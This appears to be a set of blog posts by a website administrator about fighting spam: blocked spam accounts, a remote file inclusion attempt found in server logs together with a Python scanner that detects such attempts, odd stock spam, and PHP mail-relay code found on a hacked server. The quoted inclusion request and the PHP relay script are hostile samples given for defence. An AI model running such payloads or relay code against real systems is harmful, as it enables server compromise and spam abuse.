Damn Spam!
Profile spam

It started out harmless enough: A registered user tried to submit a spam post. What I do in such a case is block the user's account. It had a yahoo.com address and the user had actually gone through the trouble of uploading a user photo - which featured the photo of a doctor and the words "online pharmacy". Nice one.

A while later, another registered user tried to edit his user profile and stuff it with the usual pharmacy spam keywords. Good thing we run user profiles through the spam filter ...

That "new" user, however, came from the same IP address as our previous guest. And that's when I noticed a whole bunch of new accounts, all using email addresses with the domain name kinglibrary.net. Well, guess what happened to those accounts. And into the blacklist with that domain name.

Altavista?

I've got the impression that over the last couple of days, the amount of webspam is slightly down, while the number of script kiddie attacks is up sharply. So I had a closer look at our logs. I noticed a whole bunch of the usual inclusion attempts like

/index.php?kunden=http://amyru.h18.ru/images/cs.txt?

Sorry, guys - our index.php doesn't even look for a "kunden" parameter (and even if it did, it wouldn't fall for that old trick).

But what I found more interesting is the referrer that came with these attempts:

http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0

Altavista? Who uses that any more?
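
A log check for inclusion attempts like the one quoted above, as an added example that is not code from this site: it flags any request whose query parameter value is itself a remote URL and tallies the referrer hosts. The Apache "combined" log layout, the function names and the sample lines are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in Apache "combined" format (an assumption about the log
# layout). Client IPs, timestamps and user agents are made up; the first
# request and its referrer are the ones quoted in the post.
SAMPLE_LOG = '''\
192.0.2.10 - - [12/Oct/2007:10:01:02 +0200] "GET /index.php?kunden=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 5120 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "ExampleAgent/1.0"
192.0.2.20 - - [12/Oct/2007:10:03:40 +0200] "GET /index.php?page=http%3A%2F%2Fexample.org%2Fx.txt%3F HTTP/1.1" 200 5120 "-" "ExampleAgent/1.0"
192.0.2.30 - - [12/Oct/2007:10:05:11 +0200] "GET /index.php?topic=spam HTTP/1.1" 200 7311 "-" "ExampleAgent/1.0"
'''

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"')
# A parameter value that is itself a remote URL is the inclusion signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_inclusion_attempts(log_text):
    """Return (client_ip, parameter, remote_url, referrer_host) per attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m['target']).query
        # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                ref_host = urlsplit(m['referer']).hostname or '-'
                hits.append((m['ip'], name, value, ref_host))
    return hits


def referrer_summary(hits):
    """Count attempts per referrer host to spot a shared search-engine source."""
    return Counter(hit[3] for hit in hits)


if __name__ == '__main__':
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(hit)
```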

Morbid spam ...

Dear Spammer, don't you think it's somewhat morbid to (try to) spam for Anna Nicole Smith Topless? The poor woman's been dead for eight months now. Unless, of course, you're trying to advertise things related to necrophilia (and, no, I didn't check out the spamvertized site ...).

Hacked server spamming

Looking through the Bad Behavior logs, I've noticed a bunch of rejected trackback spam attempts from 64.71.177.84, belonging to Hurricane Electric (Not the first time I've seen that name, btw. They seem to be popular with the spammers, for whatever reason ...).

Well, I decided to type that IP address into my browser and got this piece of PHP code:

; $from_mail = "phpauth@yandex.ru";
$to_mail = "grigory@mail.astrakhan.ru";
$message = "Subject: test\nFrom: $from_mail\nTo: $to_mail\ntest";
$host = "smtp.yandex.ru";
$port = 25;
$errno = 30;
$errstr = 1;
$timeout = 1;
$handle = fsockopen($host, $port, $errno, $errstr, $timeout);
fputs($handle, "EHLO $host\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, "AUTH LOGIN\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, base64_encode($user) . "\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, base64_encode($pass) . "\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, "MAIL FROM:<$from_mail>\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, "RCPT TO:<$to_mail>\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, "DATA\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, "$message\r\n.\r\n");
echo fread($handle, 4096) . "\n\n";
fputs($handle, "QUIT\r\n");
echo fread($handle, 4096) . "\n\n";
fclose($handle);
?>

Offtopic: Email stock spam

Email stock spam has reached a new low of (un-)readability. I found this in my inbox this morning:

Subject: +[!]:.:!*)+(*)[++  (-!-.)!  )!)(*-(- !

Sy+m b.oool F)D.E)G
Price 0.04
Ta.rg:et 0.12

... and that was the entire content of the email. No attachments, no HTML.

I have a hard time believing that this would work. Which sane person would care to decipher this and then actually go and buy that stock? Surely the people stupid enough to fall for that sort of scam are too stupid to understand that email in the first place. I mean, the early stock spams at least tried to look like "insider tips". But this?

My current theory is that this sort of stock spam isn't really targeted at normal people any more. There is probably some sort of ecosystem of freeloaders in place now. I.e. people who know that this is a scam to drive up the prices but buy the stock nonetheless, accepting that they get a smaller piece of the cake than the actual spammer.

Fortunately, neither stock spam nor this sort of obfuscation are common in webspam.

Copyright © 2013 Damn Spam! Powered by Geeklog